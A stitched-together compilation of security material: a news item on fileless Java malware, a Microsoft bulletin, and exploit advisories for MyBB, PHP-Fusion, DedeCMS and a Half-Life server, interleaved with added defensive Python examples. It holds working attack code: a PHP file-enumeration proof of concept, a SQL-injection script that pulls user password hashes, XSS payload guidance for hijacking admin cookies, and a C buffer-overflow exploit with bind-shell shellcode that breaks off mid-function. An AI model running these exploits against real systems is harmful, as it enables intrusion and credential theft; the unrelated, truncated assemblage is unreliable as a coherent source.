
Researchers discover a new kind of "fileless" malware

Researchers recently discovered an extremely rare, possibly unique, "fileless" malware: it stores no files on the infected computer's hard disk and runs entirely in memory.

The discovery was made by Kaspersky Lab, which had received reports of malware attacking a commonly used Java vulnerability. The reports came from several Russian websites, but the attacks appeared to leave no file traces, unlike conventional Trojan attacks.

In practice, the attack runs JavaScript from an iFrame embedded in a compromised website, then injects an encrypted .dll payload directly into the Javaw.exe process.

The purpose of this very unusual malware appears to be twofold: first, to disable Windows User Account Control (UAC); second, to set up a command-controllable bot that acts as a "pathfinder", receiving instructions from a control server, which in the observed cases included installing the Lurk data-stealing Trojan on the infected computer.

The attack's weakness is that a user only needs to reboot the computer to clear it from memory, although the machine may then be re-infected. Conversely, that same weakness makes it very hard to detect: it stores no files on the target PC and, above all, modifies no files. If the target is unpatched, security software has great difficulty spotting it.

Using Java also makes the malware cross-platform, able to attack PC, Mac and Linux machines, although the Trojan attacks recorded so far run only on Windows.

Kaspersky also reminds us that this new malware recalls the well-known Code Red and Slammer worms of a decade ago, which were simple in construction but spread extremely fast because they exploited buffer overflows in specific Microsoft programs and likewise needed no files to propagate.

"Based on our analysis of the protocol Lurk uses to communicate with its command servers, we have determined that over the past few months these servers have handled requests from as many as 300,000 infected computers," said Kaspersky researcher Sergey Golovanov.
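Detection logic for the two behaviours the article describes, an injected payload living inside Javaw.exe and the disabling of UAC, written as an added example rather than anything from Kaspersky or the article. The records are constructed, simplified Sysmon-style events (event 8 CreateRemoteThread with SourceImage/TargetImage, event 13 registry value set with TargetObject/Details); the paths and the EnableLUA policy value are the only real names used.

```python
"""Flag in-memory behaviour that leaves no file: a remote thread involving javaw.exe,
and a registry write that turns UAC off. Added example; events are constructed."""
import json

# Constructed sample log, one JSON event per line (not a real capture).
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "Image": r"C:\Program Files\Java\jre7\bin\javaw.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"EventID": 8, "SourceImage": r"C:\Program Files\Java\jre7\bin\javaw.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Java\jre7\bin\javaw.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Example\Setting", "Details": "DWORD (0x00000001)"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\winlogon.exe"},
])

def is_uac_disable(ev):
    """EnableLUA set to 0 switches UAC off; no normal application does this."""
    return (ev.get("EventID") == 13
            and ev.get("TargetObject", "").lower().endswith(r"\policies\system\enablelua")
            and "0x00000000" in ev.get("Details", ""))

def is_java_remote_thread(ev):
    """A remote thread created by or into the Java runtime is a strong injection signal."""
    if ev.get("EventID") != 8:
        return False
    src = ev.get("SourceImage", "").lower()
    dst = ev.get("TargetImage", "").lower()
    return src.endswith("javaw.exe") or dst.endswith("javaw.exe")

def scan(jsonl_text):
    """Return (rule, offending process image) for every matching event, in log order."""
    findings = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if is_java_remote_thread(ev):
            findings.append(("remote_thread_javaw", ev.get("SourceImage")))
        if is_uac_disable(ev):
            findings.append(("uac_disabled", ev.get("Image")))
    return findings

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_LOG):
        print(f"{rule}: {image}")
```

Both rules key on behaviour rather than on a file hash, which is the only kind of signal a memory-only payload leaves; a reboot clears the process but not the log.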

 


MS07-035: Vulnerability in Win 32 API Could Allow Remote Code Execution
Published: June 12, 2007   Version: 1.0
Summary:
This critical security update resolves a privately reported vulnerability in the Win32 API. The vulnerability could allow remote code execution or elevation of privilege if a specially crafted application uses the affected API locally. Applications that use this Win32 API component can therefore serve as a vector for the vulnerability; for example, Internet Explorer uses this Win32 API function when parsing a specially crafted web page.
This is a critical security update for all supported editions of Windows 2000, Windows XP and Windows Server 2003.
The security update addresses the vulnerability by changing the way the Win32 API validates parameters.
Recommendation: Microsoft recommends that customers apply the update immediately.
Known issues: None
Affected software
Operating system                                                                                  Maximum security impact   Aggregate severity rating   Bulletin replaced by this update
Windows 2000 Service Pack 4                                                                       Remote code execution     Critical                    MS06-051
Windows XP Service Pack 2                                                                         Remote code execution     Critical                    MS06-051
Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2        Remote code execution     Critical                    MS06-051
Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2                         Remote code execution     Critical                    MS06-051
Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2                Remote code execution     Critical                    MS06-051
Windows Server 2003 SP1 for Itanium-based Systems and Windows Server 2003 SP2 for Itanium-based Systems   Remote code execution     Critical                    MS06-051
Non-affected software
Operating system: Windows Vista; Windows Vista x64 Edition
Microsoft security bulletin:
http://www.microsoft.com/china/technet/security/bulletin/MS07-035.mspx
(the link above goes to a third-party site)
Notice: https://www.sitedirsec.com publishes the latest vulnerabilities, please follow it
MyBB 1.8.12 Stored XSS Vulnerability
MyBB (versions 1.8.12 and prior at the time of writing) is vulnerable to a cross-site scripting bug which would
allow a moderator to take over an administrator's account. In addition to this, it is also possible to perform file
enumeration in the instances where it is not possible to spawn a shell. This can be used in conjunction with
the FPD and other bugs in order to elevate the level of access and map out a potential attack surface.

-------------------------------------------------------------------------------------------------------------
Cross-Site Scripting:
-------------------------------------------------------------------------------------------------------------
A moderator or administrator can make an announcement, and can inject JavaScript into this.
MyBB however says:
> Should HTML be parsed in the announcement? (Javascript is removed)
> Source: https://docs.mybb.com/1.6/Mod-CP-Forums-Posts/#Adding.2FEditing_an_Announcement

<script> tags are stripped from the content but you can simply use generic HTML tags with event
handlers in order to trigger javascript, for example:

<svg/onload="document.write('hi');">

When a user views the thread, the javascript will execute.
Since a moderator can post these threads, they can craft a payload that would allow them to hijack
the cookies for an admin account or create a fake login page via document.write which would hopefully
trick an admin into re-authenticating (giving up their credentials) when attempting to view the thread.

This is a stored/persistent attack and anyone who views the thread will be hit with the payload.

Once you have gained an admin account, it is generally pretty trivial to get shell access.
There is a method that has worked for years and will work in most cases:

- From AdminCP, Navigate to 'Templates and Styles'
- Determine the MyBB Theme currently in use
- Navigate to 'Templates'
- Open Templates used by the current theme
- Select 'calendar templates'
- Click 'calendar' then paste code to your shell and save
- Navigate to http://[HOST]/calendar.php to access your shell

In the instance that you can't get a shell, then File Enumeration can still be performed as seen below:

-------------------------------------------------------------------------------------------------------------
Full Path Disclosure:
-------------------------------------------------------------------------------------------------------------
Almost all the parameters are vulnerable to this, but this is an example of one:
  http://[HOST]/mybb/admin/index.php?module[]


In older versions of MyBB, it's possible to get FPD (and also have some PHP configuration info output) without
requiring ACP access; this can be done via insertion of an array into the 'sid' GET parameter.
Example:

http://[HOST]/search.php?action=results&sid[]=YourSessionID&sortby=&order=desc


-------------------------------------------------------------------------------------------------------------
File Enumeration:
-------------------------------------------------------------------------------------------------------------
File enumeration can be performed, allowing an attacker to search for the existence of vulnerable plugins, locate
paths to config files, etc.

We'll enumerate files by changing the theme file to a file we want. If the file exists, it will not give an error.
If the file does not exist, it'll throw an error.

A working Proof-of-Concept (written in PHP) is given here:
-------------------------------------------------------------------------------------------------------------
<?php
  //////////////////////////////////////////////////////// PROJECT  INSECURITY ////////////////////////////////////////////////////////
  # Your cookies (an authenticated AdminCP session)
  $cookies = "acploginattempts=; adminsid=; mybbuser=; collapsed=; mybb[lastvisit]=; mybb[lastactive]=; loginattempts=; _ga=; sid=";

  # Your 'postkey' (the my_post_key CSRF token of that session)
  $post_key = "";

  # Target URL
  $url = "http://localhost/mybb/";

  # The file to enumerate
  $file = "index.php";

  # How many paths you wanna go back
  $amount = 10;

  # Proxy information
  $enable_proxy = 0;
  $proxy_info   = "127.0.0.1:9150";

  //////////////////////////////////////////////////////// PROJECT  INSECURITY ////////////////////////////////////////////////////////

  function post( $url, $post_key, $cookies, $file, $proxy_info, $proxy )
  {
    # The theme editor form; "editortheme" is the field that ends up being opened as a file
    $post_data = http_build_query( array(
      "my_post_key"     => "{$post_key}",
      "tid"             => "5",
      "name"            => "insecurity",
      "pid"             => "1",
      "templateset"     => "1",
      "editortheme"     => "{$file}"
    ));

    $headers = array( "Cookie: {$cookies}" );

    $cURL = curl_init( rtrim( $url, '/' ) . "/admin/index.php?module=style-themes&action=edit" );

    curl_setopt( $cURL, CURLOPT_POST, true );
    curl_setopt( $cURL, CURLOPT_HTTPHEADER, $headers );
    curl_setopt( $cURL, CURLOPT_POSTFIELDS, $post_data );
    curl_setopt( $cURL, CURLOPT_RETURNTRANSFER, true );

    if( $proxy == 1 )
    {
      # Edit this if you wanna use your own proxy
      curl_setopt( $cURL, CURLOPT_PROXY, $proxy_info );
    }

    $response = curl_exec( $cURL );
    curl_close( $cURL );

    return $response;
  }

  $found = false;

  for ( $i = 0; $i < $amount; $i++ )
  {
    # Walk up one directory per iteration: "", "../", "../../", ...
    $path = str_repeat( "../", $i );

    $result = post( $url, $post_key, $cookies, ( $path . $file ), $proxy_info, $enable_proxy );

    # No error <div> in the response means the file was opened, i.e. it exists
    if( !preg_match( '/<div class="error">(.*?)<\/div>/s', $result ) )
    {
      $found = true;
      break;
    }
  }

  if ( $found )
    print "<b>{$file}</b> does exist.";
  else
    print "<b>{$file}</b> does not exist.";

?>
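The three server-side checks whose absence the advisory above relies on, written as one added example (not MyBB's code and not the advisory's): an allowlist HTML sanitiser for announcement bodies, which is what "Javascript is removed" has to mean if `<svg/onload=...>` is to be caught; a scalar-only parameter reader that refuses PHP-style `name[]` arrays of the kind that trigger the full path disclosure; and a path-containment check for theme or template file names, which closes the `../` file-enumeration loop. The tag lists, the directory layout and all sample inputs are constructed for the demo.

```python
"""Allowlist sanitising, scalar parameters and path containment. Added example."""
import os
import re
import tempfile
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# --- 1. HTML: stripping <script> alone leaves event-handler attributes alive ---
def strip_script_tags(html):
    """The blocklist approach: remove <script>...</script> and nothing else."""
    return re.sub(r"<\s*script\b.*?<\s*/\s*script\s*>", "", html, flags=re.I | re.S)

ALLOWED_TAGS = {"b", "i", "u", "p", "br", "a", "ul", "ol", "li"}   # constructed policy
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL = re.compile(r"^(https?:)?/", re.I)   # relative or http(s) links only

class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document keeping only allowlisted tags and attributes."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                       # svg, img, iframe, ... are dropped whole
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                 # every on* handler and any other stray attribute
            if name == "href" and not SAFE_URL.match(value):
                continue                 # javascript:, data:, vbscript: schemes
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def sanitize(html):
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)

# --- 2. Query strings: a scalar parameter must not arrive as an array ---
def scalar_param(query, name):
    """Return the single value of `name`; raise if absent, repeated, or sent as name[]."""
    params = parse_qs(query, keep_blank_values=True)
    if any(k.startswith(name + "[") for k in params):
        raise ValueError(f"{name} must be a scalar, not an array")
    values = params.get(name, [])
    if len(values) != 1:
        raise ValueError(f"{name} missing or repeated")
    return values[0]

# --- 3. File names: canonicalise, then confirm the result stays under the theme dir ---
def resolve_theme_file(base_dir, requested):
    if not requested or "\x00" in requested:
        raise ValueError("empty or NUL-containing file name")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the theme directory")
    return target

def rejects(fn, *args):
    """True when fn(*args) raises ValueError; used to make the checks testable."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True

def path_demo():
    """Constructed layout: <root>/inc/themes/default.css and <root>/inc/config.php."""
    root = tempfile.mkdtemp()
    themes = os.path.join(root, "inc", "themes")
    os.makedirs(themes)
    for rel in ("themes/default.css", "config.php"):
        with open(os.path.join(root, "inc", rel), "w") as fh:
            fh.write("/* constructed stub */")
    verdict = {}
    for req in ("default.css", "../config.php", "../../../etc/passwd"):
        verdict[req] = "rejected" if rejects(resolve_theme_file, themes, req) else "allowed"
    return verdict
```

The sanitiser never tries to recognise "bad" markup; it emits only what the policy names, so a new element or attribute is dropped by default. The path check compares canonical paths rather than looking for `../` substrings, which also covers encoded or symlinked variants.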
PHP-Fusion 2.x SQL Injection Vulnerability
<?php
print_r("
/*********************************************************
*      Expanded Calendar 2.x (PHP-Fusion module)        *
*      User pass disclosure exploit                     *
*      Found by Matrix86 of Rbt-4 Crew                  *
*      Site: www.rbt-4.net                              *
*      Mail: info[at]rbt-4[dot]net                      *
*********************************************************
* Bug found in                                          *
*      /infusions/calendar_events_panel/show_single.php *
* Line:                                                 *
*      27                                               *
* Vulnerability type: Sql injection                     *
* Unpatched!                                            *
* Patch:                                                *
* Line 26:                                              *
* if(!isset($sel)||!isNum($sel)) fallback(\"index.php\"); *
*********************************************************/
");

if($argc < 4) die("Usage: ".$argv[0]." [site] [path] [user_id]\nExample: ".$argv[0]." localhost /php-fusion/ 1\n");

ini_set("max_execution_time",0);
ini_set("default_socket_timeout",4);

$host    = $argv[1];
$path    = $argv[2];
$user_id = $argv[3];
$port    = 80;

# $sel is concatenated into the query, so a UNION pulls rows out of fusion_users
$sqlinit = "infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=";
$sqlend  = "/*";

function send($req)
{
  global $host,$port;
  $ip = gethostbyname($host);
  if(stristr($host,$ip)) die("Error: Host not found\n");
  if(!($sock = fsockopen($ip,$port))) die("Error: unable open sock!\n");
  fputs($sock,$req);
  $response = "";
  while (!feof($sock)) {
    $response .= fgets($sock,128);
  }
  fclose($sock);
  return $response;
}

$packet  = "GET ".$path.$sqlinit.$user_id.$sqlend." HTTP/1.0\n";
$packet .= "User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko)\n";
$packet .= "Host: ".$host."\n";
$packet .= "Connection: Close\n\n";

echo "Packet:\n".$packet."\n\n";

$resp = send($packet);

# The injected row is rendered into the event page; cut the hash and user name back out of the HTML
$temp = explode("<td colspan='2'><font size='4'><u>",$resp);
if(isset($temp[1])) {
  $temp2 = explode("<td colspan='3' style='border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px'><font style='font-size: 11px'>",$temp[1]);
  $temp3 = explode("</td>",$temp2[1]);
  $username = $temp3[0];
  $md5 = substr($temp[1],0,32);
  echo "Id user:  ".$user_id."\nUsername: ".$username."\nPassword: ".$md5."\n";
} else {
  echo("Bug Fixed..sorry!\n");
}
exit();
?>
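The show_single.php bug above, rebuilt in Python on sqlite3 so that the vulnerable query and the patched one can be run side by side. This is an added example, not PHP-Fusion's code or the advisory's: the schema, the rows, the password-hash value and the `is_num` helper (a digits-only stand-in for PHP-Fusion's `isNum()`) are constructed for the demo.

```python
"""Unparameterised $sel beside the isNum()-plus-bound-parameter fix. Added example."""
import sqlite3

def build_db():
    """Constructed two-table schema with one user and one calendar event."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE fusion_users(user_id INTEGER, user_name TEXT, user_password TEXT);
        CREATE TABLE calendar_events(event_id INTEGER, event_title TEXT, event_text TEXT);
        INSERT INTO fusion_users VALUES (1, 'admin', '0123456789abcdef0123456789abcdef');
        INSERT INTO calendar_events VALUES (1, 'Release meeting', 'constructed sample text');
    """)
    return db

def show_single_vulnerable(db, sel):
    """$sel spliced into the SQL text, as the advisory describes for line 27."""
    sql = ("SELECT event_id, event_title, event_text FROM calendar_events "
           "WHERE event_id=" + sel)
    return db.execute(sql).fetchall()

def is_num(value):
    """Stand-in for PHP-Fusion's isNum(): decimal digits only."""
    return value.isdigit()

def show_single_fixed(db, sel):
    """The advisory's patch line: reject a non-numeric $sel, then bind the value."""
    if not is_num(sel):
        raise ValueError("fallback('index.php')")
    return db.execute("SELECT event_id, event_title, event_text FROM calendar_events "
                      "WHERE event_id=?", (int(sel),)).fetchall()

# Same shape as the advisory's payload: comments in place of spaces, UNION onto fusion_users
INJECTED_SEL = ("-1/**/UNION/**/SELECT/**/user_id,user_name,user_password"
                "/**/FROM/**/fusion_users/**/WHERE/**/user_id=1")

def compare(sel):
    """Run one sel value through both versions; returns (vulnerable rows, fixed result)."""
    db = build_db()
    try:
        fixed = show_single_fixed(db, sel)
    except ValueError as e:
        fixed = str(e)
    return show_single_vulnerable(db, sel), fixed

if __name__ == "__main__":
    print(compare("1"))
    print(compare(INJECTED_SEL))
```

The bound parameter is the actual fix; the numeric check on its own is what the advisory proposes and is sufficient here only because `sel` is an integer id. Note that the original UNION pads to twelve columns to match the calendar query; the padding is only reproduced as far as this three-column demo needs.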
Latest DedeCMS V5.3 Arbitrary Variable Overwrite Vulnerability

DedeCMS V5.3 Arbitrary Variable Overwrite Vulnerability

BY flyh4t 2008-12-12

DedeCMS V5.3 has been released, but the variable overwrite vulnerability still has not been completely fixed. This bug is very similar to ryat's one :) Look at the code in the core file include/common.inc.php:

// check and register externally submitted variables
foreach($_REQUEST as $_k=>$_v)
{
    if( strlen($_k)>0 && eregi('^(_|cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) ) // did the programmer's logic get muddled?
    {
        exit('Request var not allow!');
    }
}

Here the filter on cfg_ and the other keywords can be bypassed by submitting a _COOKIE variable of the same name. Next comes the variable registration code:

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}

Then the variables are initialised:

// database configuration file
require_once(DEDEDATA.'/common.inc.php');
// system configuration parameters
require_once(DEDEDATA."/config.cache.inc.php");

That looks unexploitable, but fortunately there is this piece of code at the end of the file:

// convert the variables related to uploaded files, apply safety handling, and include the front-end common upload functions
if($_FILES)
{
    require_once(DEDEINC.'/uploadsafe.inc.php');
}

Now look at what uploadsafe.inc.php gives us:

$keyarr = array('name','type','tmp_name','size');
foreach($_FILES as $_key=>$_value)
{
    foreach($keyarr as $k)
    {
        if(!isset($_FILES[$_key][$k]))
        {
            exit('Request Error!');
        }
    }
    $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\","\\",$_FILES[$_key]['tmp_name']);

Note this spot: through the common.inc.php vulnerability we can control $_FILES[$_key]['tmp_name'], so by submitting something like common.inc.php?_FILES[cfg_xxxx][tmp_name]=aaaaaa&... we can overwrite cfg_xxxx. When exploiting this, remember to set the cookie as well, and to get past some of the checks inside uploadsafe.inc.php.
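The request-variable filter, the registration loop, the config reload and the uploadsafe step quoted above, modelled in Python so that the cookie bypass and a corrected check can be compared. This is an added example, not DedeCMS code; the `cfg_example` setting name, the request and cookie dictionaries and the `fixed_check` function (which simply drops the `!isset($_COOKIE[$_k])` clause) are constructed for the demo.

```python
"""Flawed versus corrected protected-prefix check, run through the quoted flow. Added example."""
import re

# Same pattern as eregi('^(_|cfg_|GLOBALS)', $_k)
PROTECTED = re.compile(r"^(_|cfg_|GLOBALS)", re.I)

def flawed_check(request, cookies):
    """Faithful to the quoted code: a protected name passes if a cookie of that name exists."""
    for k in request:
        if len(k) > 0 and PROTECTED.match(k) and k not in cookies:
            raise PermissionError("Request var not allow!")

def fixed_check(request, cookies):
    """Reject protected names regardless of where they came from ($_REQUEST includes cookies)."""
    for k in request:
        if PROTECTED.match(k):
            raise PermissionError("Request var not allow!")

def run_request(check, get, cookie, post=None):
    """Return the final value of cfg_example after the whole common.inc.php sequence."""
    post = post or {}
    request = {**get, **post, **cookie}            # $_REQUEST, cookies last as in EGPCS order
    try:
        check(request, cookie)
    except PermissionError as e:
        return str(e)
    ns = {}                                          # the global symbol table
    for source in (get, post, cookie):               # foreach(Array('_GET','_POST','_COOKIE') ...)
        ns.update(source)                            #   ${$_k} = _RunMagicQuotes($_v)
    ns["cfg_example"] = "original"                   # config.cache.inc.php re-initialises settings
    for key, spec in (ns.get("_FILES") or {}).items():   # uploadsafe.inc.php
        if not isinstance(spec, dict) or not all(k in spec for k in ("name", "type", "tmp_name", "size")):
            return "Request Error!"
        ns[key] = spec["tmp_name"]                   # $$_key = $_FILES[$_key]['tmp_name']
    return ns["cfg_example"]

# Constructed attacker input: the same _FILES array in the query string and in the cookie,
# as the post advises ("remember to set the cookie as well")
ATTACK = {"_FILES": {"cfg_example": {"name": "x", "type": "x", "tmp_name": "attacker", "size": "1"}}}

if __name__ == "__main__":
    print("flawed:", run_request(flawed_check, ATTACK, ATTACK))
    print("fixed: ", run_request(fixed_check, ATTACK, ATTACK))
```

The model also shows why the plain `cfg_example=...` route "looks unexploitable": the overwrite happens before config.cache.inc.php resets the value, whereas the uploadsafe step runs after it.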
Half-Life Server 3.1.1.0 Remote Buffer Overflow Exploit
/******************************************************************
 * hoagie_hlserver.c
 *
 * Remote exploit for Halflife-Servers.
 *
 * Binds a shell to port 30464/tcp and connects to it.
 *
 * Author: KnbykL <info@knbykl.org>
 * Thnx : All Soldier HbT
 *
 * This hole was found by Auriemma Luigi.
 * Uses code from the proof-of-concept DoS-exploit by Auriemma Luigi.
 *
 * Tested with HL-Server v3.1.1.0. Works only with the Linux server
 * (though making a Win32-exploit should be trivial)
 *
 * How this exploit works:
 * There is a buffer on the stack that is being overwritten with
 * our supplied shellcode. Too bad that it lies on an address that
 * has 0xFF in it (e.g. 0xbfffe000) and half life filters these
 * characters out, so we can't write the address of the shellcode
 * there.
 * Luckily, the function that copies the shellcode into the buffer
 * has the address of the buffer in %eax when it exits. So, we jump
 * to the location 0x0804AE93 (which is the same in ALL half life
 * servers, thanks to the fact that it is a binary distribution)
 * where the instruction "call *%eax" is located. And so the shellcode
 * gets executed...
 *
 * Dil (Language): I always stand behind my Turkish.
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
 * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
 * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
 ******************************************************************/

#include    <stdio.h>
#include    <stdlib.h>
#include    <string.h>
#include    <time.h>
#include    <unistd.h>
#include    <sys/socket.h>
#include    <sys/types.h>
#include    <sys/select.h>
#include    <sys/time.h>
#include    <arpa/inet.h>
#include    <netdb.h>

#define VER         "0.1"
#define BUFFSZ      4096
#define PORT        27015
#define INFO        "\xff\xff\xff\xff" \
                    "infostring\n"
#define GETCH       "\xff\xff\xff\xff" \
                    "getchallenge\n"
#define TIMEOUT     5    /* 5 seconds */
#define PICOFFSET   0xD0404

// 13*13+5=174
// 5*16+13+43+7*16+12=260
// 260-174 = 86 NOPs = 6*13+8
#define PAYLOAD     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
                    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
                    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
                    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
                    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
                    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
                    "\x90\x90\x90\x90" \
                    "\x31\xc0\x40\x40\xcd\x80\x89\xc0\x85\xc0\x74\x06\x31" \
                    "\xc0\xb0\x01\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2" \
                    "\xb0\x66\xb3\x01\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02" \
                    "\x51\x8d\x0c\x24\xcd\x80\xb3\x02\xb1\x02\x31\xc9\x51" \
                    "\x51\x51\x80\xc1\x77\x66\x51\xb1\x02\x66\x51\x8d\x0c" \
                    "\x24\xb2\x10\x52\x51\x50\x8d\x0c\x24\x89\xc2\x31\xc0" \
                    "\xb0\x66\xcd\x80\xb3\x01\x53\x52\x8d\x0c\x24\x31\xc0" \
                    "\xb0\x66\x80\xc3\x03\xcd\x80\x31\xc0\x50\x50\x52\x8d" \
                    "\x0c\x24\xb3\x05\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x31" \
                    "\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd\x80\x41" \
                    "\x31\xc0\xb0\x3f\xcd\x80\x31\xdb\x53\x68\x6e\x2f\x73" \
                    "\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x31" \
                    "\xc9\x51\x53\x8d\x0c\x24\x31\xc0\xb0\x0b\xcd\x80\x31" \
                    "\xc0\xb0\x01\xcd\x80" \
                    /* EIP */ "%c%c%c%c%c%c%c%c%c%c%c%c"
                    // "BBBB"
/* PAYLOAD is 268 bytes! */

#define MODEL       "robo"
#define NAME        "]I[gore"
#define TOPCOLOR    "25"     /* 0-255, it's NOT important */
#define BOTTOMCOLOR "161"    /* 0-255, it's NOT important */
#define BOF1        "\xff\xff\xff\xff" \
                    "connect %d" \
                    " %s \"" \
                    "\\prot\\2" \
                    "\\unique\\-1" \
                    "\\raw\\%08lx%08lx%08lx%08lx" \
                    "\" \"" \
                    "\\model\\" MODEL \
                    "\\topcolor\\" TOPCOLOR \
                    "\\bottomcolor\\" BOTTOMCOLOR \
                    "\\rate\\9999.000000" \
                    "\\cl_updaterate\\20" \
                    "\\cl_lw\\1" \
                    "\\cl_lc\\1" \
                    "\\cl_dlmax\\128" \
                    "\\hud_classautokill\\1" \
                    "\\name\\" NAME \
                    "\\" PAYLOAD "\\value" \
                    "\"\n"
#define BUGNUM      ""

int exec_sh(int sockfd)
{
        char snd[4096], rcv[4096];
        fd_set rset;

        while(1)
        {
                FD_ZERO(&rset);
                FD_SET(fileno(stdin), &rset);
                FD_SET(sockfd, &rset);
                select(255, &rset, NULL, NULL, NULL);
                if(FD_ISSET(fileno(stdin), &rset))
                {
                        memset(snd, 0, sizeof(snd));
                        fgets(snd, sizeof(snd), stdin);
                        write(sockfd, snd, strlen(snd));
                }
                if(FD_ISSET(sockfd, &rset))
                {
                        memset(rcv, 0, sizeof(rcv));
                        if(read(sockfd, rcv, sizeof(rcv) - 1) <= 0)
                                exit(0);
                        fputs(rcv, stdout);
                }
        }
}

int connect_sh(char *server)
{
        int sockfd;
        struct sockaddr_in sin;
        struct hostent *he;

        printf("Connect to the shell\n");
        fflush(stdout);
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port   = htons(30464);
        if((he = gethostbyname(server)) == NULL) perror("gethostbyname"), exit(1);
        memcpy(&sin.sin_addr, *(he->h_addr_list), sizeof(sin.sin_addr));
        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        {
                printf("Can't create socket\n");
                exit(0);
        }
        if(connect(sockfd, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        {
                printf("Can't connect to the shell\n");
                exit(0);
        }
        return sockfd;
}

int getproto(char *buff);
int timeout2(int sock);
void showinfostring(char *buff, int size);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
    char            buffrecv[BUFFSZ],
                    buffsend[sizeof(BOF1) + 64],
                    challenge[16],
                    *bofstr,
                    *stri,
                    *strf;
    struct sockaddr_in peer;
    int             sd, err, bufflen, proto;
    socklen_t       rlen;
    unsigned long   offset;

    setbuf(stdout, NULL);

    if(argc < 3) {
        printf("\nUsage: %s <host> <port>\n(the default server port is %d)\n\n", argv[0], PORT);
        exit(1);
    }

    printf("OK team, follow my command.\n");
    srand(time(NULL));
    bofstr = BOF1;

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(atoi(argv[2]));
    // offset=strtoul(argv[3],NULL,16);
    peer.sin_family      = AF_INET;
    rlen                 = sizeof(peer);
    offset = 0x0804AE93;   // call eax
    printf("Using offset 0x%08lx...\n", offset);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    /* GET INFORMATIONS */
    err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen);
    if(err < 0) std_err();
    err = timeout2(sd);
    if(err < 0) {
        fputs("\nError: socket timeout\n", stdout);
        exit(1);
    }
    err = recvfrom(sd, buffrecv, BUFFSZ - 1, 0, (struct sockaddr *)&peer, &rlen);
    if(err < 0) std_err();
    buffrecv[err] = 0x00;
    proto = getproto(buffrecv);
    showinfostring(buffrecv, err);

    /* GET CHALLENGE NUMBER */
    err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen);
    if(err < 0) std_err();
    err = timeout2(sd);
    if(err < 0) {
        fputs("\nError: socket timeout\n", stdout);
        exit(1);
    }
    err = recvfrom(sd, buffrecv, BUFFSZ - 1, 0, (struct sockaddr *)&peer, &rlen);
    if(err < 0) std_err();
    buffrecv[err] = 0x00;
    stri = strchr(buffrecv, 0x20);
    if(!stri) stri = buffrecv;
    strf = strchr(stri + 1, 0x20);
    if(!strf) strf = buffrecv + err;
    *strf = 0x00;
